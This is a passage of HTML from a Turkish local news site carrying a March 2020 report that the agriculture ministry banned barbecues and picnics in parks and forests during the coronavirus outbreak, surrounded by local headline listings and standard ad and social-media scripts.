keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/6-ayakli-dogan-kuzu-gorenleri-sasirtiyor-h66097.html" title="6 ayaklı doğan kuzu, görenleri şaşırtıyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/03/Ysimsiz-1_31.jpg" alt="6 ayaklı doğan kuzu, görenleri şaşırtıyor" class="pull-left" /> <div class="caption-line"><p>6 ayaklı doğan kuzu, görenleri...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-oguzhan-tas-son-yolculuguna-ugurlandi-h66093.html" title="Şehit uzman onbaşı Oğuzhan Taş, son yolculuğuna uğurlandı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/03/Ysimsiz-1_30.jpg" alt="Şehit uzman onbaşı Oğuzhan Taş, son yolculuğuna uğurlandı" class="pull-left" /> <div class="caption-line"><p>Şehit uzman onbaşı Oğuzhan Taş,...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/oztunc-nurhak-ikinci-bir-hidroelektrik-santrali-kaldiramaz-h66092.html" title="Öztunç: “Nurhak ikinci bir hidroelektrik santrali kaldıramaz”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/03/Ysimsiz-1_29.jpg" alt="Öztunç: “Nurhak ikinci bir hidroelektrik santrali kaldıramaz”" class="pull-left" /> <div class="caption-line"><p>Öztunç: “Nurhak ikinci bir hidroelektrik...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="Elbistan&#039;a şehit ateşi düştü" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/03/Ysimsiz-1_28.jpg" alt="Elbistan&#039;a şehit ateşi düştü" class="pull-left" /> <div class="caption-line"><p>Elbistan'a şehit ateşi düştü</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/hifzisihha-meclisinden-42-maddelik-koronavirus-karari-h66082.html" title="Hıfzısıhha Meclisi’nden 42 maddelik koronavirüs kararı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/03/vali.jpg" alt="Hıfzısıhha Meclisi’nden 42 maddelik koronavirüs kararı" class="pull-left" /> <div class="caption-line"><p>Hıfzısıhha Meclisi’nden 42 maddelik koronavirüs...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Yatay Reklamlar --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9060105052041849" data-ad-slot="7690067735" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı</h1> <h2 class="lead" itemprop="description"><strong>Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-03-21 13:58:35" content="2020-03-21T13:58:35+02:00">21 Mart 2020 Cumartesi 13:58</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg" alt="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistanbalikdunyasi.com" target="_blank"><img src="https://www.elbistanolay.com/sites/84/uploads/2020/01/17/large/balikdunyasi.gif" alt="Balik Dunyasi Reklam" border="0"/></a></div> <div class="reklam reklam135 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=43" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/600-animasyon_1.gif" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner43" /></a></div> <div itemprop="articleBody" id="newsbody"><span style="font-size: 16px;"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Tarım ve Orman Bakanlığı; vatandaşların "evde kalın" çağrısına uymayarak park ve mesire alanlarına akın etmesi nedeniyle, bahçe, park ve mesire alanlarında mangal yakılmasını ve piknik yapılmasını yasakladı.</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></span> <p class="MsoNormal" style="text-indent:7.1pt;tab-stops:10.0cm"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Koronavirüsle mücadele kapsamında önlemler giderek artıyor. Yetkililerin "evde kalın" çağrısına rağmen çok sayıda vatandaş park ve mesire alanlarına akın edince Tarım ve Orman Bakanlığı harekete geçti. Bakanlık bahçe, park ve mesire alanlarında mangal yakılmasını ve piknik yapılmasını yasakladı.<br/></span></span><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Tarım ve Orman Bakanı Bekir Pakdemirli, konuyla ilgili, " Milli parklarda, ormanlarda ve bakanlığımıza bağlı park ve bahçelerde mangal yakılması yasaklanmıştır" açıklamasını yaptı.</span></span></p></div> <div class="reklam reklam136 text-center"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Yatay Reklamlar --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9060105052041849" data-ad-slot="7690067735" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/alagoz-ekonomik-pakette-oncelik-esnaflara-verilmeliydi-h66106.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/berber-ve-kuaforler-saat-1800den-sonra-kapanacak-h66105.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gungor-imar-plani-calismalarini-yerinde-inceledi-h66104.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/iyi-parti-genclik-kollarindan-yaslilar-icin-gonulluluk-hareketi-h66102.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-oguzhan-tas-son-yolculuguna-ugurlandi-h66093.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-mirac-allah-a-yukselis-ve-arinmadir-h66099.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-bulut-tarim-sektoru-icin-de-ekonomik-paket-aciklanmali-h66098.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/6-ayakli-dogan-kuzu-gorenleri-sasirtiyor-h66097.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-general-kredi-ertelemesine-yonelik-calismalar-basladi-h66096.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bassavciliktan-cezaevinde-salgin-tedbiri-yok-iddialarina-yalanlama-h66095.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-vergi-dairesinden-mukelleflere-yeni-mobil-ve-interaktif-hizmetler-h66094.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunc-nurhak-ikinci-bir-hidroelektrik-santrali-kaldiramaz-h66092.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-el-birligi-ve-dogru-tedbirlerle-bu-sureci-atlatacagiz-h66088.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nurhakta-planlanan-3-regulatorlu-hes-icin-ced-sureci-basladi-h66087.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ozel-yasam-hastanesi-dezenfekte-edildi-h66086.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/beton-mikseri-devrildi-2-yarali-h66084.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaski-su-zammini-nisan-sonuna-erteledi-h66083.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hifzisihha-meclisinden-42-maddelik-koronavirus-karari-h66082.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-2-yarali-h66081.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/aday-ogretmenlerden-mehmetcik-vakfina-destek-h66080.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-ekonomik-istikrar-kalkani-paketini-acikladi-h66079.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/afsinli-taksici-ingilterede-koronavirus-nedeniyle-hayatini-kaybetti-h66078.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/canakkale-zaferinin-yildonumu-kutlamalarina-sade-toren-h66077.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/alagoz-ekonomik-pakette-oncelik-esnaflara-verilmeliydi-h66106.html" title="Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/alagoz_ekonomik_pakette_oncelik_esnaflara_verilmeliydi_h66106_b7e6a.jpg" alt="Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/berber-ve-kuaforler-saat-1800den-sonra-kapanacak-h66105.html" title="Berber ve kuaförler, saat 18.00’den sonra kapanacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/berber_ve_kuaforler_saat_1800den_sonra_kapanacak_h66105_4b083.jpg" alt="Berber ve kuaförler, saat 18.00’den sonra kapanacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Berber ve kuaförler, saat 18.00’den sonra kapanacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gungor-imar-plani-calismalarini-yerinde-inceledi-h66104.html" title="Başkan Güngör, imar planı çalışmalarını yerinde inceledi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/baskan_gungor_imar_plani_calismalarini_yerinde_inceledi_h66104_8a193.jpg" alt="Başkan Güngör, imar planı çalışmalarını yerinde inceledi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Güngör, imar planı çalışmalarını yerinde inceledi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html" title="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg" alt="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/iyi-parti-genclik-kollarindan-yaslilar-icin-gonulluluk-hareketi-h66102.html" title="İYİ Parti Gençlik Kolları’ndan yaşlılar için gönüllülük hareketi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/iyi_parti_genclik_kollarindan_yaslilar_icin_gonulluluk_hareketi_h66102_59280.jpg" alt="İYİ Parti Gençlik Kolları’ndan yaşlılar için gönüllülük hareketi" /> <div class="carousel-caption"> <h2> <span style="font-size:">İYİ Parti Gençlik Kolları’ndan yaşlılar için gönüllülük hareketi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-oguzhan-tas-son-yolculuguna-ugurlandi-h66093.html" title="Şehit uzman onbaşı Oğuzhan Taş, son yolculuğuna uğurlandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/sehit_uzman_onbasi_oguzhan_tas_son_yolculuguna_ugurlandi_h66093_0fa4e.jpg" alt="Şehit uzman onbaşı Oğuzhan Taş, son yolculuğuna uğurlandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şehit uzman onbaşı Oğuzhan Taş, son yolculuğuna uğurlandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-mirac-allah-a-yukselis-ve-arinmadir-h66099.html" title="Başkan Gürbüz, “Miraç Allah&#039;a yükseliş ve arınmadır”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/baskan_gurbuz_mirac_allah_a_yukselis_ve_arinmadir_h66099_a0c60.jpg" alt="Başkan Gürbüz, “Miraç Allah&#039;a yükseliş ve arınmadır”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz, “Miraç Allah&#039;a yükseliş ve arınmadır”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-bulut-tarim-sektoru-icin-de-ekonomik-paket-aciklanmali-h66098.html" title="Başkan Bulut: “Tarım sektörü için de ekonomik paket açıklanmalı”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/baskan_bulut_tarim_sektoru_icin_de_ekonomik_paket_aciklanmali_h66098_692e3.jpg" alt="Başkan Bulut: “Tarım sektörü için de ekonomik paket açıklanmalı”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Bulut: “Tarım sektörü için de ekonomik paket açıklanmalı”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/6-ayakli-dogan-kuzu-gorenleri-sasirtiyor-h66097.html" title="6 ayaklı doğan kuzu, görenleri şaşırtıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/6_ayakli_dogan_kuzu_gorenleri_sasirtiyor_h66097_4d32d.jpg" alt="6 ayaklı doğan kuzu, görenleri şaşırtıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">6 ayaklı doğan kuzu, görenleri şaşırtıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-general-kredi-ertelemesine-yonelik-calismalar-basladi-h66096.html" title="Başkan General: “Kredi ertelemesine yönelik çalışmalar başladı”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/baskan_general_kredi_ertelemesine_yonelik_calismalar_basladi_h66096_4f333.jpg" alt="Başkan General: “Kredi ertelemesine yönelik çalışmalar başladı”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan General: “Kredi ertelemesine yönelik çalışmalar başladı”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bassavciliktan-cezaevinde-salgin-tedbiri-yok-iddialarina-yalanlama-h66095.html" title="Başsavcılıktan ‘cezaevinde salgın tedbiri yok’ iddialarına yalanlama"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/bassavciliktan_cezaevinde_salgin_tedbiri_yok_iddialarina_yalanlama_h66095_a3e80.jpg" alt="Başsavcılıktan ‘cezaevinde salgın tedbiri yok’ iddialarına yalanlama" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başsavcılıktan ‘cezaevinde salgın tedbiri yok’ iddialarına yalanlama</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-vergi-dairesinden-mukelleflere-yeni-mobil-ve-interaktif-hizmetler-h66094.html" title="Elbistan Vergi Dairesi’nden mükelleflere yeni mobil ve interaktif hizmetler"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/elbistan_vergi_dairesinden_mukelleflere_yeni_mobil_ve_interaktif_hizmetler_h66094_00cb1.jpg" alt="Elbistan Vergi Dairesi’nden mükelleflere yeni mobil ve interaktif hizmetler" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Vergi Dairesi’nden mükelleflere yeni mobil ve interaktif hizmetler</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/oztunc-nurhak-ikinci-bir-hidroelektrik-santrali-kaldiramaz-h66092.html" title="Öztunç: “Nurhak ikinci bir hidroelektrik santrali kaldıramaz”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/oztunc_nurhak_ikinci_bir_hidroelektrik_santrali_kaldiramaz_h66092_5a9d5.jpg" alt="Öztunç: “Nurhak ikinci bir hidroelektrik santrali kaldıramaz”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç: “Nurhak ikinci bir hidroelektrik santrali kaldıramaz”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="Elbistan&#039;a şehit ateşi düştü"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/elbistan_a_sehit_atesi_dustu_h66085_82669.jpg" alt="Elbistan&#039;a şehit ateşi düştü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan&#039;a şehit ateşi düştü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-el-birligi-ve-dogru-tedbirlerle-bu-sureci-atlatacagiz-h66088.html" title="Başkan Gürbüz: “El birliği ve doğru tedbirlerle bu süreci atlatacağız”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/baskan_gurbuz_el_birligi_ve_dogru_tedbirlerle_bu_sureci_atlatacagiz_h66088_5dfcd.jpg" alt="Başkan Gürbüz: “El birliği ve doğru tedbirlerle bu süreci atlatacağız”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz: “El birliği ve doğru tedbirlerle bu süreci atlatacağız”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nurhakta-planlanan-3-regulatorlu-hes-icin-ced-sureci-basladi-h66087.html" title="Nurhak’ta planlanan 3 regülatörlü HES için ÇED süreci başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/nurhakta_planlanan_3_regulatorlu_hes_icin_ced_sureci_basladi_h66087_a7094.jpg" alt="Nurhak’ta planlanan 3 regülatörlü HES için ÇED süreci başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nurhak’ta planlanan 3 regülatörlü HES için ÇED süreci başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ozel-yasam-hastanesi-dezenfekte-edildi-h66086.html" title="Özel Yaşam Hastanesi dezenfekte edildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/ozel_yasam_hastanesi_dezenfekte_edildi_h66086_57737.jpg" alt="Özel Yaşam Hastanesi dezenfekte edildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Özel Yaşam Hastanesi dezenfekte edildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/beton-mikseri-devrildi-2-yarali-h66084.html" title="Beton mikseri devrildi: 2 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/beton_mikseri_devrildi_2_yarali_h66084_ee000.jpg" alt="Beton mikseri devrildi: 2 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Beton mikseri devrildi: 2 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaski-su-zammini-nisan-sonuna-erteledi-h66083.html" title="KASKİ, su zammını Nisan sonuna erteledi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/kaski_su_zammini_nisan_sonuna_erteledi_h66083_f90ce.jpg" alt="KASKİ, su zammını Nisan sonuna erteledi" /> <div class="carousel-caption"> <h2> <span style="font-size:">KASKİ, su zammını Nisan sonuna erteledi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hifzisihha-meclisinden-42-maddelik-koronavirus-karari-h66082.html" title="Hıfzısıhha Meclisi’nden 42 maddelik koronavirüs kararı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/hifzisihha_meclisinden_42_maddelik_koronavirus_karari_h66082_60c93.jpg" alt="Hıfzısıhha Meclisi’nden 42 maddelik koronavirüs kararı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hıfzısıhha Meclisi’nden 42 maddelik koronavirüs kararı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-2-yarali-h66081.html" title="Otomobil elektrik direğine çarptı: 2 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/otomobil_elektrik_diregine_carpti_2_yarali_h66081_293de.jpg" alt="Otomobil elektrik direğine çarptı: 2 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil elektrik direğine çarptı: 2 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/aday-ogretmenlerden-mehmetcik-vakfina-destek-h66080.html" title="Aday öğretmenlerden Mehmetçik Vakfı’na destek"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/aday_ogretmenlerden_mehmetcik_vakfina_destek_h66080_b2e67.jpg" alt="Aday öğretmenlerden Mehmetçik Vakfı’na destek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Aday öğretmenlerden Mehmetçik Vakfı’na destek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-ekonomik-istikrar-kalkani-paketini-acikladi-h66079.html" title="Cumhurbaşkanı Erdoğan, ‘Ekonomik İstikrar Kalkanı’ paketini açıkladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/cumhurbaskani_erdogan_ekonomik_istikrar_kalkani_paketini_acikladi_h66079_2b00b.jpg" alt="Cumhurbaşkanı Erdoğan, ‘Ekonomik İstikrar Kalkanı’ paketini açıkladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cumhurbaşkanı Erdoğan, ‘Ekonomik İstikrar Kalkanı’ paketini açıkladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/afsinli-taksici-ingilterede-koronavirus-nedeniyle-hayatini-kaybetti-h66078.html" title="Afşinli taksici, İngiltere’de koronavirüs nedeniyle hayatını kaybetti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/afsinli_taksici_ingilterede_koronavirus_nedeniyle_hayatini_kaybetti_h66078_93853.jpg" alt="Afşinli taksici, İngiltere’de koronavirüs nedeniyle hayatını kaybetti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Afşinli taksici, İngiltere’de koronavirüs nedeniyle hayatını kaybetti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/canakkale-zaferinin-yildonumu-kutlamalarina-sade-toren-h66077.html" title="Çanakkale Zaferi’nin yıldönümü kutlamalarına sade tören"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/03/canakkale_zaferinin_yildonumu_kutlamalarina_sade_toren_h66077_daac2.jpg" alt="Çanakkale Zaferi’nin yıldönümü kutlamalarına sade tören" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çanakkale Zaferi’nin yıldönümü kutlamalarına sade tören</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a 